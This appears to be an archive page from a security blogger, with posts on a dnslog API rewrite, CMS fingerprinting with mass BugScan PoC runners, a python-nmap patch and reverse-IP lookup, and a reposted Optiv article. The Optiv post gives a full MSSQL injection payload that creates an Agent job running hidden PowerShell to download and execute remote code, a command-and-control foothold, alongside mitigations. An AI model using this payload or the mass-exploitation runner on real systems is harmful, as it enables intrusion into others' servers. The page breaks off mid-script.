Server-side template injection tutorial from the Burp (PortSwigger) team

Published: February 27, 2017 // Categories: work log, linux, reposts, windows // 1 Comment

URL: http://blog.portswigger.net/2015/08/server-side-template-injection.html
Quite long... I skimmed it, and it really is explained very clearly.
I'll translate it when I find the time.

XSS filter evasion references:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

https://html5sec.org/

**Recovering Python code from memory**

https://gist.github.com/simonw/8aa492e59265c1a021f5c5618f9e6b12

**Using svn to download a specific folder or file from a GitHub project**
Say we want to download:

https://github.com/xubo245/SparkLearning/tree/master/docs

the two folders below it, each containing several PDF files.
Method:
change "tree/master" to "trunk"

https://github.com/xubo245/SparkLearning/trunk/docs

Then check it out:

svn checkout https://github.com/xubo245/SparkLearning/trunk/docs

Some notes

1.XML external entity (XXE) injection vulnerabilities

https://www.vsecurity.com//download/papers/XMLDTDEntityAttacks.pdf

2.Server-side code injection vulnerabilities

https://www.mindedsecurity.com/fileshare/ExpressionLanguageInjection.pdf

3.SSI injection

http://httpd.apache.org/docs/current/howto/ssi.html

Reworking the dnslog API into the output format we need

Published: December 13, 2016 // Categories: dev notes, linux, python, windows, everyday life // No Comments

I used to use cloudeye, whose API was friendly beyond belief. Later I tried ceye.io for a while, but ceye.io is simply unstable, so I turned to dnslog. Its being open source really is convenient, but its API is painfully limited.
Say we have a whoami parameter.

Query it through the API:

http://webadmin.secevery.com/api/web/www/whoami/

It comes back false. Comparing carefully against its API function, it turns out to be:

def api(request, logtype, udomain, hashstr):
    apistatus = False
    host = "%s.%s." % (hashstr, udomain)
    if logtype == 'dns':
        res = DNSLog.objects.filter(host__contains=host)
        if len(res) > 0:
            apistatus = True
    elif logtype == 'web':
        res = WebLog.objects.filter(path__contains=host)
        if len(res) > 0:
            apistatus = True
    else:
        return HttpResponseRedirect('/')
    return render(request, 'api.html', {'apistatus': apistatus})


host = "%s.%s." % (hashstr, udomain) 这尼玛~
只能查询xxxx.fuck.dns5.org的类型了.对于fuck.dns5.org/?cmd=fuck的形式好像不能查询。这尼玛~本想重新改写的.发现工程量太大了,就拿dnslog来修改api函数就好了
#Rewriting the API:
#1. By default, return all log entries
#2. Support /api/xxxx/dns|web/
#3. Support pinpoint lookups via /api/xxxx/(dns|web)/xxxx/
Steps
#First fetch the userid
#xxx = (select userid from logview_user where udomain = udomain)
 
Then, depending on dns|web, run the corresponding SQL:
if logtype == 'dns':
        #run: select log_time,host from logview_dnslog where userid = xxx and path like '%hashstr%'
elif logtype == 'web':
        #run: SELECT "remote_addr","http_user_agent","log_time","path" FROM "logview_weblog" WHERE "user_id"=xxx and path like '%hashstr%'
 
The hashstr here can actually be empty. Testing against the default database:

SELECT "log_time","remote_addr","http_user_agent","path" FROM "logview_weblog" WHERE user_id=(select id from logview_user where udomain = 'test') and path like '3%'
log_time    remote_addr http_user_agent path
113.135.96.202  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36    123.test.dnslog.link/
113.135.96.202  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36    123.test.dnslog.link/favicon.ico

Keeping hashstr empty:

SELECT "log_time","remote_addr","http_user_agent","path" FROM "logview_weblog" WHERE user_id=(select id from logview_user where udomain = 'test') and path like '%%'

the result is still:

log_time    remote_addr http_user_agent path
113.135.96.202  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36    123.test.dnslog.link/
113.135.96.202  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36    123.test.dnslog.link/favicon.ico

So the query result stays complete even without a hashstr.
 
The roughly rewritten API function:

def api(request, logtype, udomain, hashstr):
    result = ''
    # udomain must not be empty
    if len(udomain) > 0:
        if logtype == 'dns':
            sql = ("select log_time,host from logview_dnslog where userid = (select userid from logview_user "
                   "where udomain = '{udomain}') and path like '%{hash}%'").format(udomain=udomain, hash=hashstr)
        elif logtype == 'web':
            sql = ("SELECT log_time,remote_addr,http_user_agent,path FROM logview_weblog WHERE user_id=(select "
                   "id from logview_user where udomain = '{udomain}') and path like '%{hash}%'").format(udomain=udomain, hash=hashstr)
        logging.info(sql)
        # execute the sql here
    return result
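Incidentally, formatting udomain and hashstr straight into the SQL makes the API itself injectable. If raw SQL is the route taken, Django's connection.cursor() supports parameter binding; a minimal sketch against the same schema (query_logs is a hypothetical helper name, and the with-style cursor assumes Django 1.7+):

from django.db import connection

def query_logs(logtype, udomain, hashstr):
    # bind parameters instead of formatting them into the statement
    with connection.cursor() as cursor:
        if logtype == 'dns':
            cursor.execute(
                "select log_time,host from logview_dnslog where userid = "
                "(select userid from logview_user where udomain = %s) and path like %s",
                [udomain, '%' + hashstr + '%'])
        else:
            cursor.execute(
                "SELECT log_time,remote_addr,http_user_agent,path FROM logview_weblog "
                "WHERE user_id=(select id from logview_user where udomain = %s) and path like %s",
                [udomain, '%' + hashstr + '%'])
        return cursor.fetchall()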



Honestly, just wishful thinking. I don't know Django well and am still in tears. And damn Chrome with its mystery bug: touch an arrow key and it crashes.


Roughly done; future bugs can wait.

def api(request, logtype, udomain, hashstr):
    import json
    result = None
    re_result = []
    host = "%s.%s." % (hashstr, udomain)
    if logtype == 'web':
        res = WebLog.objects.all().filter(path__contains=hashstr)
        if len(res) > 0:
            for rr in res:
                result = dict(
                    time = str(rr.log_time),
                    ipaddr = rr.remote_addr,
                    ua = rr.http_user_agent,
                    path = rr.path
                )
                re_result.append(result)

    elif logtype == 'dns':
        res = DNSLog.objects.all().filter(host__contains=host)
        if len(res) > 0:
            for rr in res:
                result = dict(
                    time = str(rr.log_time),
                    host = rr.host
                    )
                re_result.append(result)

    else:
        return HttpResponseRedirect('/')
    return render(request, 'api.html', {'apistatus': json.dumps(re_result)})
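One small simplification: since the view only emits JSON, Django's JsonResponse (available since Django 1.7) could replace the api.html template; safe=False is needed to serialize a list. A sketch of the last line:

from django.http import JsonResponse

# instead of render(request, 'api.html', {'apistatus': json.dumps(re_result)}):
return JsonResponse(re_result, safe=False)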

Online CMS fingerprinting and invoking BugScan plugins

Published: October 23, 2016 // Categories: dev notes, linux, python, windows // No Comments

I figured rolling my own would best fit my needs, but the problem is it would take too long, and the coverage probably wouldn't be broad either.

Then I happened upon http://whatweb.bugscaner.com/ and found its coverage is pretty good: the common CMSes have all been integrated. I tested a few and the false-positive rate was within an acceptable range, so I automated it. A simple demo follows. The drawback is that it only takes http targets; https isn't supported, since the site strips http|https:// from the submission.

#!/usr/bin/python
import re
import json
import requests



def whatcms(url):
    headers = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
        "Referer":"http://whatweb.bugscaner.com/look/",
        }
    """
    try:
        res = requests.get('http://whatweb.bugscaner.com/look/',timeout=60, verify=False)
        if res.status_code==200:
            hashes = re.findall(r'value="(.*?)" name="hash" id="hash"',res.content)[0]
    except Exception as e:
        print str(e)
        return False
    """
    data = "url=%s&hash=0eca8914342fc63f5a2ef5246b7a3b14_7289fd8cf7f420f594ac165e475f1479"%(url)
    try:
        response = requests.post("http://whatweb.bugscaner.com/what/",data=data,headers=headers,timeout=60, verify=False)
        if int(response.status_code)==200:
            result = json.loads(response.content)
            if len(result["cms"])>0:
                return result["cms"]
            else:
                return "www"
    except Exception as e:
        print str(e)
        return "www"

if __name__ == '__main__':
    import sys
    url = sys.argv[1]
    print whatcms(url)
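The hardcoded hash token presumably expires at some point; the commented-out block in whatcms already shows how to scrape a fresh one from the /look/ page. Wired up as a helper, it would look roughly like this:

def get_hash():
    # scrape a fresh hash token from the /look/ page
    # (same regex as the commented-out block above)
    res = requests.get('http://whatweb.bugscaner.com/look/', timeout=60, verify=False)
    return re.findall(r'value="(.*?)" name="hash" id="hash"', res.content)[0]

# then build the POST body with a live token instead of the hardcoded one:
# data = "url=%s&hash=%s" % (url, get_hash())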

Anything unrecognized is classified as www. With that sorted, time to integrate the plugins. The idea is to classify first: read the service out of each plugin file's content, then store the filename and service in a database for later lookup. A simple little script:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re,os,glob,time
from mysql_class import MySQL
"""
logging.basicConfig(
    level=logging.DEBUG,
    format="[%(asctime)s] %(levelname)s: %(message)s")
"""
"""
1.识别具体的cms
2.从数据库获取cms--如果没有获取到考虑全部便利
3.输出结果
"""
def timestamp():
    return str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))

"""
DROP TABLE IF EXISTS `bugscan`;
CREATE TABLE `bugscan` (
    `id` int(11) NOT NULL AUTO_INCREMENT,
    `service` varchar(256) COLLATE utf8_bin DEFAULT NULL,
    `filename` varchar(256) COLLATE utf8_bin DEFAULT NULL,
    `time` varchar(256) COLLATE utf8_bin DEFAULT NULL,
    PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=utf8 COLLATE=utf8_bin;
SET FOREIGN_KEY_CHECKS = 1;
"""
dbconfig = {'host':'127.0.0.1','port': 3306,'user':'root','passwd':'root123','db':'proscan','charset':'utf8'}
db = MySQL(dbconfig)

def insert(filename):
    file_data = open(filename,'rb').read()
    service = re.findall(r"if service.*==(.*?):",file_data)
    if len(service)>0:
        servi = service[0].replace("'", "").replace("\"", "").replace(" ", "")
        
        sqlInsert = "insert into `bugscan`(id,service,filename,time) values ('','%s','%s','%s');" % (str(servi),str(filename.replace('./bugscannew/','')),str(timestamp()))
        print sqlInsert
        #db.query(sql=sqlInsert)

for filename in glob.glob(r'./bugscannew/*.py'):
    insert(filename)
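A side note: the INSERT is assembled by string formatting, which breaks as soon as a filename or service string contains a quote. With a raw MySQLdb connection (an assumption here; the mysql_class wrapper may expose something equivalent), a parameterized version inside insert() would be:

import MySQLdb

conn = MySQLdb.connect(host='127.0.0.1', port=3306, user='root',
                       passwd='root123', db='proscan', charset='utf8')
cur = conn.cursor()
# let the driver escape the values instead of formatting them in
cur.execute("insert into `bugscan` (service, filename, time) values (%s, %s, %s)",
            (servi, filename.replace('./bugscannew/', ''), timestamp()))
conn.commit()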

Then I thought about how to invoke a specific plugin for the actual check. I mulled it over for quite a while, until recently, with some spare time, I read through pocscan. Its approach is neat: add the plugin directory to the Python path, then from xxx import audit, and the problem is solved.

def import_poc(pyfile,url):
    poc_path = os.getcwd()+"/bugscannew/"
    path = poc_path + pyfile + ".py"
    filename = path.split("/")[-1].split(".py")[0]
    sys.path.append(poc_path)
    poc0 = imp.load_source('audit', path)
    audit_function = poc0.audit
    from dummy import *
    audit_function.func_globals.update(locals())
    ret = audit_function(url)
    if ret is not None and 'None' not in ret:
        #print ret
        return ret
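One caveat with imp.load_source: every plugin gets registered under the same module name 'audit', so each load overwrites the previous entry in sys.modules. Using the file's own name avoids stale-module surprises (a sketch, reusing the filename variable computed above):

# register each plugin under its own module name instead of reusing 'audit'
poc0 = imp.load_source(filename, path)
audit_function = poc0.audit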

There's no perfect invocation method yet, so here's a simple demo.

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re,os
import imp,sys
import time,json
import logging,glob
import requests
from mysql_class import MySQL
"""
logging.basicConfig(
    level=logging.DEBUG,
    format="[%(asctime)s] %(levelname)s: %(message)s")
"""
"""
1.识别具体的cms
2.从数据库获取cms--如果没有获取到考虑全部便利
3.输出结果
"""
def timestamp():
    return str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))

"""
DROP TABLE IF EXISTS `bugscan`;
CREATE TABLE `bugscan` (
    `id` int(11) NOT NULL AUTO_INCREMENT,
    `service` varchar(256) COLLATE utf8_bin DEFAULT NULL,
    `filename` varchar(256) COLLATE utf8_bin DEFAULT NULL,
    `time` varchar(256) COLLATE utf8_bin DEFAULT NULL,
    PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=utf8 COLLATE=utf8_bin;
SET FOREIGN_KEY_CHECKS = 1;
"""
dbconfig = {'host':'127.0.0.1','port': 3306,'user':'root','passwd':'root123','db':'proscan','charset':'utf8'}
db = MySQL(dbconfig)

def insert(filename):
    file_data = open(filename,'rb').read()
    service = re.findall(r"if service.*==(.*?):",file_data)
    if len(service)>0:
        servi = service[0].replace("'", "").replace("\"", "").replace(" ", "")
        
        sqlInsert = "insert into `bugscan`(id,service,filename,time) values ('','%s','%s','%s');" % (str(servi),str(filename.replace('./bugscannew/','')),str(timestamp()))
        print sqlInsert
        #db.query(sql=sqlInsert)
        #print servi,filename

def check(service,url):
    if service == 'www':
        sqlsearch = "select  filename from  `bugscan` where service = '%s'" %(service)
    elif service != 'www':
        sqlsearch = "select  filename from  `bugscan` where service = 'www' or service = '%s'" %(service)
    print sqlsearch 
    if int(db.query(sql=sqlsearch))>0:
        result = db.fetchAllRows()
        for row in result:
            #return result
            for colum in row:
                colum = colum.replace(".py","")
                import_poc(colum,url)

def import_poc(pyfile,url):
    poc_path = os.getcwd()+"/bugscannew/"
    path = poc_path + pyfile + ".py"
    filename = path.split("/")[-1].split(".py")[0]
    sys.path.append(poc_path)
    poc0 = imp.load_source('audit', path)
    audit_function = poc0.audit
    from dummy import *
    audit_function.func_globals.update(locals())
    ret = audit_function(url)
    if ret is not None and 'None' not in ret:
        #print ret
        return ret

def whatcms(url):
    headers = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
        "Referer":"http://whatweb.bugscaner.com/look/",
        }
    """
    try:
        res = requests.get('http://whatweb.bugscaner.com/look/',timeout=60, verify=False)
        if res.status_code==200:
            hashes = re.findall(r'value="(.*?)" name="hash" id="hash"',res.content)[0]
    except Exception as e:
        print str(e)
        return False
    """
    data = "url=%s&hash=0eca8914342fc63f5a2ef5246b7a3b14_7289fd8cf7f420f594ac165e475f1479"%(url)
    try:
        response = requests.post("http://whatweb.bugscaner.com/what/",data=data,headers=headers,timeout=60, verify=False)
        if int(response.status_code)==200:
            result = json.loads(response.content)
            if len(result["cms"])>0:
                return result["cms"]
            else:
                return "www"
    except Exception as e:
        print str(e)
        return "www"
        
if __name__ == '__main__':
    #for filename in glob.glob(r'./bugscannew/*.py'):
    #   insert(filename)
    url = "http://0day5.com/"
    print check(whatcms(url),url)

There are still gaps. The invocation part could use multithreading for speed, and if the CMS can't be identified, the result is bound to be inaccurate, yet loading every plugin and fuzzing through all of them is too slow.

Then I got the demo from the great Qi. It's more brute force: load everything and fuzz in one pass.

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# papapa.py
import re
import socket
import sys
import os
import urlparse
import time
from dummy.common import *
import miniCurl  # provides the Curl() used by the plugins below
import util
from dummy import *
import importlib
import threading
import Queue as que


class Worker(threading.Thread):  # processes job requests
    def __init__(self, workQueue, resultQueue, **kwds):
        threading.Thread.__init__(self, **kwds)
        self.setDaemon(True)
        self.workQueue = workQueue
        self.resultQueue = resultQueue

    def run(self):
        while 1:
            try:
                callable, args, kwds = self.workQueue.get(False)  # get task
                res = callable(*args, **kwds)
                self.resultQueue.put(res)  # put result
            except que.Empty:
                break


class WorkManager:  # thread pool: create and manage workers
    def __init__(self, num_of_workers=10):
        self.workQueue = que.Queue()  # job queue
        self.resultQueue = que.Queue()  # result queue
        self.workers = []
        self._recruitThreads(num_of_workers)

    def _recruitThreads(self, num_of_workers):
        for i in range(num_of_workers):
            worker = Worker(self.workQueue, self.resultQueue)  # create a worker thread
            self.workers.append(worker)  # add it to the pool

    def start(self):
        for w in self.workers:
            w.start()

    def wait_for_complete(self):
        while len(self.workers):
            worker = self.workers.pop()  # take a thread from the pool
            worker.join()
            if worker.isAlive() and not self.workQueue.empty():
                self.workers.append(worker)  # put it back into the pool
        #logging.info('All jobs were complete.')

    def add_job(self, callable, *args, **kwds):
        self.workQueue.put((callable, args, kwds))  # push a job onto the work queue

    def get_result(self, *args, **kwds):
        return self.resultQueue.get(*args, **kwds)
"""
lst=os.listdir(os.getcwd())
pocList =(','.join(c.strip('.py') for c in lst if os.path.isfile(c) and c.endswith('.py'))).split(',')
for line in pocList:
    try:
        #print line
        xxoo = importlib.import_module(line)
        xxoo.curl = miniCurl.Curl()
        xxoo.security_hole = security_hole
        xxoo.task_push = task_push
        xxoo.util =util
        xxoo.security_warning = security_warning
        xxoo.security_note = security_note
        xxoo.security_info = security_info
        xxoo.time = time
        xxoo.audit('http://0day5.com')
    except Exception as e:
        print line,e
"""

def bugscan(line,url):
    #print line,url
    try:
        xxoo = importlib.import_module(line)
        xxoo.curl = miniCurl.Curl()
        xxoo.security_hole = security_hole
        xxoo.task_push = task_push
        xxoo.util =util
        xxoo.security_warning = security_warning
        xxoo.security_note = security_note
        xxoo.security_info = security_info
        xxoo.time = time
        xxoo.audit(url)
    except Exception as e:
        #print line,e
        pass

def main(url):
    wm = WorkManager(20)
    lst = os.listdir(os.getcwd())
    # strip('.py') trims characters, not the suffix, and mangles module names;
    # use splitext to derive the module name safely
    pocList = [os.path.splitext(c)[0] for c in lst if os.path.isfile(c) and c.endswith('.py')]
    for line in pocList:
        if 'apa' not in line:  # skip this script itself (papapa.py)
            wm.add_job(bugscan, line, url)
    wm.start()
    wm.wait_for_complete()

start = time.time()
main('http://0day5.com/')
print time.time()-start

Accuracy is worrying; for reference only.

MSSQL Agent Jobs for Command Execution

Published: October 7, 2016 // Categories: ops work, work log, linux, windows // No Comments

The primary purpose of the Optiv attack and penetration testing (A&P) team is to simulate adversarial threat activity in an effort to test the efficacy of defensive security controls. Testing is meant to assess many facets of organizational security programs by using real-world attack scenarios. This type of assessment helps identify areas of strength, or areas of improvement regarding organizations' IT security processes, personnel and systems.

There exists a cat-and-mouse game in IT security, a never-ending arms race. Malicious actors implement new attacks; defensive controls are deployed to detect and deter those same attacks. It behooves organizations to attempt to be proactive in their defensive posture, and identify new methods of attack and preemptively put controls in place to stop them. Optiv A&P strives to maintain technical expertise in both the offensive and attack arena, along with the defensive methods used to detect and prevent attacks. To stay relevant and effective in this ever-changing threat landscape, it is paramount that organizations that specialize in assessing organizational security posture stay relevant to the tactics, techniques and procedures (TTPs) that are used by genuine threat actors. Optiv engages in proactive threat research to identify TTPs that could be used by threat actors to compromise systems or data.

Attacks that Stay Below the Radar

A goal of many attackers is to implement campaigns that go undetected. The longer an organization is unaware of a breach condition, the more time an attacker has to identify and exfiltrate sensitive information, and to use the compromised environment as a pivot point for more nefarious activity.

Optiv A&P implements advanced attacks in an effort to identify gaps in detective capabilities, and assist organizations in detecting the attacks.

A recent example of this activity is abusing native functionality with Microsoft SQL Server (MSSQL) to gain command and control of database servers using MSSQL Server Agent Jobs. 

Microsoft SQL Server Agent

The MSSQL Server Agent is a Windows service that can be used to perform automated tasks. The agent jobs can be scheduled, and run under the context of the MSSQL Server Agent service. However, using agent proxy capabilities, the jobs can be run with different credentials as well.

The Attack

During a recent engagement, a SQL injection condition was identified in a web application that was using MSSQL Server 2012. At the request of the client, Optiv performed the assessment in a surreptitious manner, making every effort to avoid detection. Optiv devised a way to take advantage of native MSSQL Server functionality to execute commands on the underlying Windows operating system. Also, the xp_cmdshell stored procedure had been disabled, and the ability to create custom stored procedures had also been limited.

Many monitoring or detection systems generate alerts when a commonly abused MSSQL stored procedure (xp_cmdshell) is used during an attack. The use of xp_cmdshell by attackers and penetration testers has led many organizations to disable it, limit its use, and tune alerting systems to watch for it.

Optiv identified a scenario wherein the MSSQL Server Agent could be leveraged to gain command execution on the target database server. However, the server had to meet several conditions:

  • The MSSQL Server Agent service needs to be running.
  • The account that is being used must have permissions to create and execute agent jobs (in this case the database account that was running the service that had a SQL injection condition). 

Optiv identified two MSSQL Agent Job subsystems that could be advantageous to attackers: the CmdExec and PowerShell subsystems. These can execute operating system commands and PowerShell, respectively.

Optiv used the SQL injection entry point to create and execute the agent job. The job's command was PowerShell code that created a connection to an Optiv-controlled IP address and downloaded additional PowerShell instructions, establishing an interactive command and control session between the database server and the Optiv-controlled server.

Here is the SQL syntax breakdown. Note, in the below download-string command, the URI is between two single quotes, not double quotes. This is to escape single quotes within SQL.

USE msdb; EXEC dbo.sp_add_job @job_name = N'test_powershell_job1' ; EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''http://IP_OR_HOSTNAME/file''))"', @retry_attempts = 1, @retry_interval = 5 ;EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; EXEC dbo.sp_start_job N'test_powershell_job1';

The above string is for easier copying and pasting, if you want to recreate this attack scenario.

The below quickly shows a demo on how to weaponize this attack.

The SQL syntax is URL encoded. In this specific instance the attack is being sent via an HTTP GET request, hence the necessity to URL encode the payload.

Shown below is the request with the SQL injection payload in the vulnerable HTTP GET parameter. Note the %20 (space character) added to the beginning of the payload.
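For what it's worth, producing the encoded payload is a one-liner in Python 2 (a sketch; the payload is truncated here to its first statement):

# URL-encode the agent-job payload for use in a GET parameter
import urllib

payload = "USE msdb; EXEC dbo.sp_add_job @job_name = N'test_powershell_job1' ;"
print urllib.quote(payload)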

Once the payload is run we can see a command and control session is established, running with the SQLSERVERAGENT account's privileges.

On the victim SQL server we can see the SQL Agent job has been created.

The below video demonstrates the full attack.

Attack Post Mortem

This attack can be leveraged to run MSSQL Server Agent jobs on other MSSQL servers, if the Agent service on the victim is configured to use an account with permissions to other MSSQL servers. Also, Agent jobs can be scheduled, and may be used as an evasive means to maintain a persistent connection to victim MSSQL servers.

In some instances, if the MSSQL Server Agent service is configured with an account that has more privileges than that of the database user, for example an Active Directory domain service account, this attack can be used by an attacker to escalate their privileges. 

Mitigation

General web application hygiene should be used to prevent attack vectors like SQL injection. Use prepared statements in SQL queries within web applications, and abstract application logic from backend databases. Employ web application firewalls to detect and block attacks on applications.

Internal systems that do not need to communicate directly with Internet hosts should be disallowed from doing so. This can prevent command and control channels from being established between internal assets, and attacker controlled endpoints. Employ strict network egress filtering.

MSSQL Server Agent jobs can be abused by any attacker that has the ability to execute SQL queries on a database server. To specifically limit the attack surface of MSSQL Server Agent jobs ensure that databases are running under the context of user accounts with the concept of least privilege. If the account that a database is running under does not have permissions to create and start MSSQL Server Agent jobs this attack is negated. Also, if the MSSQL Server Agent service is not in use it should be disabled. 

Pitfalls hit when python-nmap wouldn't report https

Published: September 1, 2016 // Categories: work log, ops work, dev notes, linux, python, windows, everyday life // No Comments

Today, while using python-nmap to scan and store results, I found https ports being flatly classified as http.

I retested carefully several times with the same outcome. Not convinced, I took a close look at the scan parameters and found that python-nmap forcibly appends the -oX - option when invoking nmap.

A normal scan is:

nmap 45.33.49.119 -p T:443 -Pn -sV --script=banner

but run through python-nmap it becomes:

nmap -oX - 45.33.49.119 -p T:443 -Pn -sV --script=banner
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/local/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.12 scan initiated Thu Sep  1 00:02:07 2016 as: nmap -oX - -p T:443 -Pn -sV -&#45;script=banner 45.33.49.119 -->
<nmaprun scanner="nmap" args="nmap -oX - -p T:443 -Pn -sV -&#45;script=banner 45.33.49.119" start="1472659327" startstr="Thu Sep  1 00:02:07 2016" version="7.12" xmloutputversion="1.04">
<scaninfo type="connect" protocol="tcp" numservices="1" services="443"/>
<verbose level="0"/>
<debugging level="0"/>
<host starttime="1472659328" endtime="1472659364"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="45.33.49.119" addrtype="ipv4"/>
<hostnames>
<hostname name="ack.nmap.org" type="PTR"/>
</hostnames>
<ports><port protocol="tcp" portid="443"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="http" product="Apache httpd" version="2.4.6" extrainfo="(CentOS)" tunnel="ssl" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.6</cpe></service><script id="http-server-header" output="Apache/2.4.6 (CentOS)"><elem>Apache/2.4.6 (CentOS)</elem>
</script></port>
</ports>
<times srtt="191238" rttvar="191238" to="956190"/>
</host>
<runstats><finished time="1472659364" timestr="Thu Sep  1 00:02:44 2016" elapsed="36.65" summary="Nmap done at Thu Sep  1 00:02:44 2016; 1 IP address (1 host up) scanned in 36.65 seconds" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

Formatted, the output reveals a tunnel attribute on the service element. But checking the parser at https://bitbucket.org/xael/python-nmap/raw/8ed37a2ac20d6ef26ead60d36f739f4679fcdc3e/nmap/nmap.py, nothing there is associated with it:

for dport in dhost.findall('ports/port'):
                # protocol
                proto = dport.get('protocol')
                # port number converted as integer
                port =  int(dport.get('portid'))
                # state of the port
                state = dport.find('state').get('state')
                # reason
                reason = dport.find('state').get('reason')
                # name, product, version, extra info and conf if any
                name = product = version = extrainfo = conf = cpe = ''
                for dname in dport.findall('service'):
                    name = dname.get('name')
                    if dname.get('product'):
                        product = dname.get('product')
                    if dname.get('version'):
                        version = dname.get('version')
                    if dname.get('extrainfo'):
                        extrainfo = dname.get('extrainfo')
                    if dname.get('conf'):
                        conf = dname.get('conf')

                    for dcpe in dname.findall('cpe'):
                        cpe = dcpe.text
                # store everything
                if not proto in list(scan_result['scan'][host].keys()):
                    scan_result['scan'][host][proto] = {}

                scan_result['scan'][host][proto][port] = {'state': state,
                                                          'reason': reason,
                                                          'name': name,
                                                          'product': product,
                                                          'version': version,
                                                          'extrainfo': extrainfo,
                                                          'conf': conf,
                                                          'cpe': cpe}

Now, what if we pulled out both name and tunnel and matched on the pair? So I modified nmap.py accordingly, around lines 410-440:

                name = product = version = extrainfo = conf = cpe = tunnel =''
                for dname in dport.findall('service'):
                    name = dname.get('name')
                    if dname.get('product'):
                        product = dname.get('product')
                    if dname.get('version'):
                        version = dname.get('version')
                    if dname.get('extrainfo'):
                        extrainfo = dname.get('extrainfo')
                    if dname.get('conf'):
                        conf = dname.get('conf')
                    if dname.get('tunnel'):
                        tunnel = dname.get('tunnel')

                    for dcpe in dname.findall('cpe'):
                        cpe = dcpe.text
                # store everything
                if not proto in list(scan_result['scan'][host].keys()):
                    scan_result['scan'][host][proto] = {}

                scan_result['scan'][host][proto][port] = {'state': state,
                                                          'reason': reason,
                                                          'name': name,
                                                          'product': product,
                                                          'version': version,
                                                          'extrainfo': extrainfo,
                                                          'conf': conf,
                                                          'tunnel':tunnel,
                                                          'cpe': cpe}

And in lines 654-670, add our new tunnel field:

        csv_ouput = csv.writer(fd, delimiter=';')
        csv_header = [
            'host',
            'hostname',
            'hostname_type',
            'protocol',
            'port',
            'name',
            'state',
            'product',
            'extrainfo',
            'reason',
            'version',
            'conf',
            'tunnel',
            'cpe'
            ]

Then we import this modified file and post-process the results: if name is http and tunnel is ssl at the same time, classify the port as https.

        for targetHost in scanner.all_hosts():
            if scanner[targetHost].state() == 'up' and scanner[targetHost]['tcp']:
                for targetport in scanner[targetHost]['tcp']:
                    #print(scanner[targetHost]['tcp'][int(targetport)])
                    if scanner[targetHost]['tcp'][int(targetport)]['state'] == 'open' and scanner[targetHost]['tcp'][int(targetport)]['product']!='tcpwrapped':
                        if scanner[targetHost]['tcp'][int(targetport)]['name']=='http' and scanner[targetHost]['tcp'][int(targetport)]['tunnel'] == 'ssl':
                            scanner[targetHost]['tcp'][int(targetport)]['name'] = 'https'
                        else:
                            scanner[targetHost]['tcp'][int(targetport)]['name'] = scanner[targetHost]['tcp'][int(targetport)]['name']
                        print(domain+'\t'+targetHost+'\t'+str(targetport) + '\t' + scanner[targetHost]['tcp'][int(targetport)]['name'] + '\t' + scanner[targetHost]['tcp'][int(targetport)]['product']+scanner[targetHost]['tcp'][int(targetport)]['version'])
                        #if scanner[targetHost]['tcp'][int(targetport)]['name'] in ["https","http"]:
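For context, the loop above assumes a scanner built along these lines (domain comes from elsewhere in my script; the host below is just the earlier example):

import nmap  # the locally patched nmap.py must shadow the installed module

scanner = nmap.PortScanner()
scanner.scan(hosts='45.33.49.119', ports='T:443',
             arguments='-Pn -sV --script=banner')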

Scan results after the patch:

Python reverse-IP (same-server) lookup

Published: July 30, 2016 // Categories: dev notes, work log, code study, linux, python, windows // No Comments

Sources used for the reverse-IP lookup:

The result looks like this:

#!/usr/bin/env python
#encoding: utf-8
import re
import sys
import json
import time
import requests
import urllib
import requests.packages.urllib3
from multiprocessing import Pool
from BeautifulSoup import BeautifulSoup
requests.packages.urllib3.disable_warnings()

headers = {'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20'}

def links_ip(host):
    '''
    Look up sites on the same IP via i.links.cn
    '''
    ip2hosts = []
    ip2hosts.append("http://"+host)
    try:
        source = requests.get('http://i.links.cn/sameip/' + host + '.html', headers=headers,verify=False)
        soup = BeautifulSoup(source.text)
        divs = soup.findAll(style="word-break:break-all")

        if divs == []: # no results
            print 'Sorry! Not found!'
            return ip2hosts
        for div in divs:
            #print div.a.string
            ip2hosts.append(div.a.string)
    except Exception, e:
        print str(e)
        return ip2hosts
    return ip2hosts

def ip2host_get(host):
    ip2hosts = []
    ip2hosts.append("http://"+host)
    try:
        req=requests.get('http://www.ip2hosts.com/search.php?ip='+str(host), headers=headers,verify=False)
        src=req.content
        if src.find('result') != -1:
            result = json.loads(src)['result']
            ip = json.loads(src)['ip']
            if len(result)>0:
                for item in result:
                    if len(item)>0:
                        #log(scan_type,host,port,str(item))
                        ip2hosts.append(item)
    except Exception, e:
        print str(e)
        return ip2hosts
    return ip2hosts


def filter(host):
    '''
        weed out sites that won't open...
    '''
    try:
